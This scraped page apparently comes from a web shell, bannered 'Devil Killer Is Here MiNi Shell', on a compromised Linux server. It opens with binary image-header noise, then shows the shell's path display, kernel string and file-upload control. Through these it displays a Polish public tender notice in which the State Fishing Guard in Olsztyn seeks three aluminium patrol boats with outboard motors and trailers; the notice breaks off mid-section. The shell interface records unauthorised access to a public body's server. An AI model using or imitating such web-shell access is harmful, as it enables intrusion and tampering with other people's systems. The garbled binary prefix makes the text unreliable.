JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240927/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20240927/0051971701-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa trzech specjalistycznych zestawów do prowadzenia kontroli na dużych akwenach wodnych . </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Państwowa Straż Rybacka w Olsztynie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 510927720</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Aleja Marszałka Józefa Piłudskiego 7/9</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Olsztyn</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">10-575</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">warmińsko-mazurskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL622 - Olsztyński</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">89 5232213</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">89 5232723</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">psr@uw.olsztyn.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.gov.pl/web/uw-warminsko-mazurski/panstwowa-straz-rybacka2</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - organ władzy publicznej - organ administracji rządowej (centralnej lub terenowej)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Porządek i bezpieczeństwo publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa trzech specjalistycznych zestawów do prowadzenia kontroli na dużych akwenach wodnych . </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-d48afba8-f9d9-43c1-a380-64a7f73f18aa</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00519717</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-09-27</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00222446/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.1 Zakup 3 specjalistycznych zestawów do prowadzenia kontroli na dużych akwenach wodnych.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Program &#34;Fundusze Europejskie dla Rybactwa na lata 2021-2027&#34; </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-d48afba8-f9d9-43c1-a380-64a7f73f18aa <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ezamowienia.gov.pl/mp-client/tenders/ocds-148610-d48afba8-f9d9-43c1-a380-64a7f73f18aa</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Zgodnie z treścią rozdziału VIII SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Administratorem Państwa danych osobowych jest Państwowa Straż Rybacka w Olsztynie,<br/>10-575 Olsztyn, Aleja Marszałka Józefa Piłsudskiego 7/9, reprezentowana przez: Komendanta Wojewódzkiego Państwowej Straży Rybackiej w Olsztynie, tel. 89 4232213, <br/>email: psr@uw.olsztyn.pl.<br/>1) Administrator wyznaczył Inspektora Ochrony Danych, z którym można się<br/>skontaktować pod adresem e-mail: psr@uw.olsztyn.pl.<br/>2) Dane osobowe przetwarzane będą w celu związanym z postępowaniem o udzielenie<br/>zamówienia publicznego PSR.272.3.2024 – PSR.3144.1.2024 „Dostawa trzech specjalistycznych zestawów do prowadzenie kontroli na dużych akwenach wodnych” Państwowej Straży Rybackiej w Olsztynie prowadzonym w trybie podstawowym, na podstawie ustawy PZP.<br/>3) Dane osobowe mogą być przekazywane wyłącznie podmiotom uprawnionym na podstawie przepisów prawa, między innymi Krajowej Izbie Odwoławczej w ramach<br/>prowadzenia postępowania odwoławczego.<br/>4) Dane osobowe przechowywane są przez okres niezbędny do realizacji wskazanych<br/>w pkt.2 celów, a po tym czasie przez okres oraz w zakresie wymaganym przez przepisy prawa.<br/>5) Podanie danych osobowych jest wymogiem ustawowym, wynika z realizacji obowiązków wynikających z przepisów prawa, tj. ustawy PZP, związanym z udziałem w postępowaniu <br/>o udzielenie zamówienia publicznego.<br/>6) Posiadają Państwo prawo do:<br/>- dostępu do treści swoich danych, ich sprostowania, ograniczenia przetwarzania*,<br/>- złożenia skargi do organu nadzorczego: Prezesa Urzędu Ochrony Danych Osobowych,<br/>ul. Stawki 2, 00-193 Warszawa.<br/><br/>* Wyjaśnienie: skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku<br/>postępowania o udzielenie zamówienia ani zmianą postanowień umowy w sprawie<br/>zamówienia publicznego w zakresie niezgodnym z ustawą PZP oraz nie może naruszać<br/>integralności protokołu oraz jego załączników.<br/>Żądanie ograniczenia przetwarzania, nie ogranicza przetwarzania danych osobowych do czasu zakończenia tego postępowania.<br/><br/>Zamawiający dodatkowo informuje, że:<br/>1) Wykonawca ubiegając się o udzielenie zamówienia publicznego jest zobowiązany<br/>do wypełnienia wszystkich obowiązków formalno-prawnych związanych z udziałem<br/>w postępowaniu. Do obowiązków tych nalezą m.in. obowiązki wynikające z RODO,<br/>w szczególności obowiązek informacyjny przewidziany w art. 13 RODO względem osób<br/>fizycznych, których dane osobowe dotyczą i od których dane te Wykonawca bezpośrednio pozyskał.<br/>Jednakże obowiązek informacyjny wynikający z art. 13 RODO nie będzie miał zastosowania, gdy i w zakresie, w jakim osoba fizyczna, której dane dotyczą, dysponuje już tymi informacjami (vide: art. 13 ust. 4).<br/>2) Wykonawca będzie musiał wypełnić obowiązek informacyjny wynikający z art.14 RODO<br/>względem osób fizycznych, których dane przekazuje Zamawiającemu i których dane<br/>pośrednio pozyskał, chyba że ma zastosowanie co najmniej jedno z wyłączeń, o których<br/>mowa w art. 14 ust. 5 RODO.<br/>W związku z powyższym Zamawiający oczekuje, że Wykonawca złoży oświadczenie<br/>o treści:<br/>&#34;Oświadczamy, że wypełniliśmy obowiązki informacyjne przewidziane w art. 13 lub art. 14<br/>RODO wobec osób fizycznych, od których dane osobowe bezpośrednio lub pośrednio<br/>pozyskaliśmy w celu ubiegania się o udzielenie zamówienia publicznego w niniejszym<br/>postępowaniu.&#34;<br/>(Wykonawca nie musi składać ww. oświadczenia w przypadku, gdy nie przekazuje danych<br/>osobowych innych niż bezpośrednio jego dotyczących lub zachodzi wyłączenie stosowania<br/>obowiązku informacyjnego, stosownie do art. 13 ust. 4 lub art. 14 ust. 5 RODO).</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">PSR.272.4.2024-PSR.3144.1.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 271545 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia będzie dostawa do siedziby zamawiającego: <br/>1/ jednego zestawu składającego się z:<br/>a) aluminiowej łodzi motorowej o wym. 460-520 z dodatkowym wyposażeniem,<br/>b) silnika zaburtowego o mocy co najmniej 60KM,<br/>c) przyczepy podłodziowej dostosowanej do przewozu w/w łodzi,<br/>2/ dwóch zestawów składających się z:<br/>a) aluminiowej łodzi motorowej o wym. 420-460 z dodatkowym wyposażeniem,<br/>b) silnika zaburtowego o mocy co najmniej 40KM,<br/>c) przyczepy podłodziowej dostosowanej do przewozu w/w łodzi,<br/>fabrycznie nowych, nieuszkodzonych i nieobciążonych prawami osób lub podmiotów trzecich, rok produkcji co najmniej 2023 o następujących parametrach i wyposażeniu:<br/>AD 1/<br/>•	dotyczących łodzi aluminiowej:<br/>a/ łódź z dnem w kształcie V, łódź w kolorze: preferowany zielony,<br/>b/ konstrukcja łodzi spawana lub klejona z komorami wypornościowymi wypełnionymi nienasiąkliwym materiałem,<br/>c/ kategoria projektowa: C/D,<br/>d/długość: od 460 cm do 520 cm,<br/>e/ maksymalna załoga: co najmniej 4 osoby,<br/>f/ pawęż do silnika z długą stopą,<br/>g/ maksymalna moc silnika: co najmniej 60 KM,<br/>h/ podwójna konsola sterownicza – pulpit sternika, w skład którego wchodzą co najmniej:<br/>- reling konsoli,<br/>- szyba czołowa konsoli z tworzywa sztucznego,<br/>- kierownica,<br/>- przekładnia kierownicza,<br/>- sterociąg,<br/>- przepusty z tworzywa sztucznego na kable i przewody,<br/>- siedziska przed konsolą (dla 2 osób),<br/>i/ podłoga łodzi zabezpieczona przed poślizgiem,<br/>j/ oświetlenie nawigacyjne przystosowane do żeglugi nocnej,<br/>k/ automatyczna pompa zęzowa, spust wody,<br/>l/ co najmniej 4 knagi cumownicze,<br/>ł/ relingi burtowe,<br/>m/ elektryczny panel sterowniczy oraz instalacja elektryczna (podłączenie elementów osprzętu do panelu sterowniczego, akumulatora, silnika i głównego wyłącznika prądu),<br/>n/ akumulator usytuowany w części dziobowej,<br/>o/ rolka dziobowa oraz ucho dziobowe,<br/>p/ podnoszony stolik na konsoli sterowniczej lub burcie,<br/>r/ ławka rufowa z bakistą rufową z klapą aluminiową, wentylacją i spływem podsilnikowym,<br/>s/ dodatkowe bakisty (schowki),<br/>t/ siedziska (ławki) dla załogi,<br/>u/ para wioseł,<br/>w/ gwarancja na łódź: co najmniej 2 lata;<br/><br/>•	dotyczących silnika zaburtowego z osprzętem:<br/>a/ maksymalna moc: co najmniej 60 KM,<br/>b/ długa kolumna,<br/>c/ elektroniczny wtrysk paliwa,<br/>d/ trym elektro-hydrauliczny,<br/>e/ zegary: obrotomierz oraz zegar trymu,<br/>f/ manetka wraz ze stacyjką,<br/>g/ zbiornik paliwa,<br/>h/ gwarancja: co najmniej 2 lata;<br/>•	dotyczących przyczepy podłodziowej:<br/>a/ przyczepa o DMC 1000kg o wymiarach dostosowanych do oferowanej łodzi,<br/>b/ ramy przyczepy ocynkowane i malowane proszkowo,<br/>c/ układ jezdny składający się z resora oraz amortyzatora, koła co najmniej 13 calowe, <br/>oś hamowana,<br/>d/ zaczep kulowy co najmniej 1000KG,<br/>e/ dziobnica z wyciągarką,<br/>f/ 2 rolki kilowe,<br/>g/ 4 rolki boczne podwójne,<br/>h/ wózek slipowy,<br/>i / wodoszczelne piasty,<br/>j/ demontowalna belka oświetleniowa,<br/>k/ koło podporowe z obejmą,<br/>l/ koło zapasowe,<br/>m/ co najmniej dwa pasy transportowe,<br/>n/ gwarancja: co najmniej 2 lata.<br/>AD 2/<br/>•	dotyczących łodzi aluminiowej:<br/>a/ łódź z dnem w kształcie V, łódź w kolorze: preferowany zielony<br/>b/ konstrukcja łodzi spawana lub klejona z komorami wypornościowymi wypełnionymi nienasiąkliwym materiałem,<br/>c/ kategoria projektowa: C/D,<br/>d/długość: od 420 cm do 460 cm,<br/>e/ maksymalna załoga: co najmniej 4 osoby,<br/>f/ pawęż do silnika z długą stopą,<br/>g/ maksymalna moc silnika: co najmniej 40 KM,<br/>h/ podwójna konsola sterownicza – pulpit sternika, w skład którego wchodzą co najmniej:<br/>- reling konsoli,<br/>- szyba czołowa konsoli z tworzywa sztucznego,<br/>- kierownica,<br/>- przekładnia kierownicza,<br/>- sterociąg,<br/>- przepusty z tworzywa sztucznego na kable i przewody,<br/>- siedziska przed konsolą (dla 2 osób),<br/>i/ podłoga łodzi zabezpieczona przed poślizgiem,<br/>j/ oświetlenie nawigacyjne przystosowane do żeglugi nocnej,<br/>k/ automatyczna pompa zęzowa, spust wody,<br/>l/ co najmniej 4 knagi cumownicze,<br/>ł/ relingi burtowe,<br/>m/ elektryczny panel sterowniczy oraz instalacja elektryczna (podłączenie elementów osprzętu do panelu sterowniczego, akumulatora, silnika i głównego wyłącznika prądu),<br/>n/ akumulator usytuowany w części dziobowej,<br/>o/ rolka dziobowa oraz ucho dziobowe,<br/>p/ podnoszony stolik na konsoli sterowniczej lub burcie,<br/>r/ ławka rufowa z bakistą rufową z klapą aluminiową, wentylacją i spływem podsilnikowym,<br/>s/ dodatkowe bakisty (schowki),<br/>t/ siedziska (ławki) dla załogi,<br/>u/ para wioseł,<br/>w/ gwarancja na łódź: co najmniej 2 lata;<br/>•	dotyczących silnika zaburtowego z osprzętem:<br/>a/ maksymalna moc: co najmniej 40 KM,<br/>b/ długa kolumna,<br/>c/ elektroniczny wtrysk paliwa,<br/>d/ trym elektro-hydrauliczny,<br/>e/ zegary: obrotomierz oraz zegar trymu,<br/>f/ manetka wraz ze stacyjką,<br/>g/ zbiornik paliwa,<br/>h/ gwarancja: co najmniej 2 lata;<br/>•	dotyczących przyczepy podłodziowej:<br/>a/ przyczepa o DMC 1000kg o wymiarach dostosowanych do oferowanej łodzi,<br/>b/ ramy przyczepy ocynkowane i malowane proszkowo,<br/>c/ układ jezdny składający się z resora oraz amortyzatora, koła co najmniej <br/>13 calowe, oś hamowana,<br/>d/ zaczep kulowy co najmniej 1000KG,<br/>e/ dziobnica z wyciągarką,<br/>f/ 2 rolki kilowe,<br/>g/ 4 rolki boczne podwójne,<br/>h/ wózek slipowy,<br/>i / wodoszczelne piasty,<br/>j/ demontowalna belka oświetleniowa,<br/>k/ koło podporowe z obejmą,<br/>l/ koło zapasowe,<br/>m/ co najmniej dwa pasy transportowe,<br/>n/ gwarancja: co najmniej 2 lata.<br/>Wszystkie w/w urządzenia powinny posiadać wymagane atesty i świadectwa homologacyjne oraz instrukcję obsługi w języku polskim, w tym dokumenty niezbędne do dokonania rejestracji.<br/>Dostarczone zestawy powinny być skompletowane, sprawdzone pod względem technicznym i gotowe do natychmiastowego użycia. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">42111100-1 - Silniki zewnętrzne do napędzania łodzi</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">34522000-2 - Łodzie rekreacyjne i sportowe</p> <p class="mb-0">34223300-9 - Przyczepy</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">28 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamówienie udzielone będzie wyłącznie Wykonawcy wybranemu zgodnie z przepisami<br/>ustawy PZP. Zamawiający wybierze ofertę, najkorzystniejszą na podstawie kryteriów oceny ofert określonych w dokumentach zamówienia.<br/>Najkorzystniejsza oferta to oferta przedstawiająca najkorzystniejszy stosunek jakości<br/>do ceny lub kosztu lub oferta z najniższą ceną lub kosztem.<br/>Jeżeli Zamawiający nie będzie mógł wybrać najkorzystniejszej oferty z uwagi na to,<br/>ze dwie lub więcej ofert przedstawia taki sam bilans ceny lub kosztu i innych kryteriów<br/>oceny ofert, Zamawiający wybiera spośród tych ofert ofertę, która otrzymała najwyższą ocenę w kryterium o najwyższej wadze. Jeżeli oferty otrzymały taką samą<br/>ocenę w kryterium o najwyższej wadze, Zamawiający wybiera ofertę z najniższą ceną<br/>lub najniższym kosztem, a jeżeli nie można dokonać wyboru oferty w taki sposób,<br/>Zamawiający wezwie Wykonawców, którzy złożyli te oferty, do złożenia w terminie<br/>określonym przez Zamawiającego ofert dodatkowych zawierających nową cenę<br/>lub koszt.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 0 udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu<br/>z postępowania o udzielenie zamówienia na postawie art. 108 ust. 1 ustawy Prawo zamówień publicznych, a także Wykonawcy, którzy nie podlegają wykluczeniu <br/>z postępowania o udzielenie zamówienia publicznego z przyczyn określonych w art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego <br/>(t.j. Dz.U. z 2024 roku poz.507). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Nie dotyczy</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający przed wyborem najkorzystniejszej oferty, wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, aktualnych na dzień złożenia następujących podmiotowych środków dowodowych w celu potwierdzenia braku podstaw do wykluczenia:<br/>1) informacji z Krajowego Rejestru Karnego w zakresie określonym w art. 108 ust.1 pkt. 1 i 2 oraz 4 ustawy PZP, sporządzonej nie wcześniej niż 6 miesięcy przed jej złożeniem;<br/>2) oświadczenia Wykonawcy w zakresie określonym w art. 108 ust. 1 pkt. 5 ustawy PZP<br/>o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia<br/>16 lutego 2007 r. o ochronie konkurencji i konsumentów (tj. Dz. U. z 2024 r. poz. 594), <br/>z innym wykonawcą, który złożył odrębną ofertę, albo oświadczenia o przynależności do tej same] grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej zgodnie z załącznikiem nr 4 do niniejszego SWZ.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Wykonawca musi zapewnić serwis gwarancyjny i pogwarancyjny na dostarczony sprzęt.<br/>Zamawiający uzna ten warunek za spełniony, jeżeli Wykonawca przedstawi w ofercie (formularz ofertowy – załącznik nr 1 do niniejszej SWZ) wykaz warsztatów (co najmniej jednego dla każdego rodzaju dostarczanego sprzętu), w tym w pierwszej kolejności położonych na terenie województwa warmińsko-mazurskiego. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) 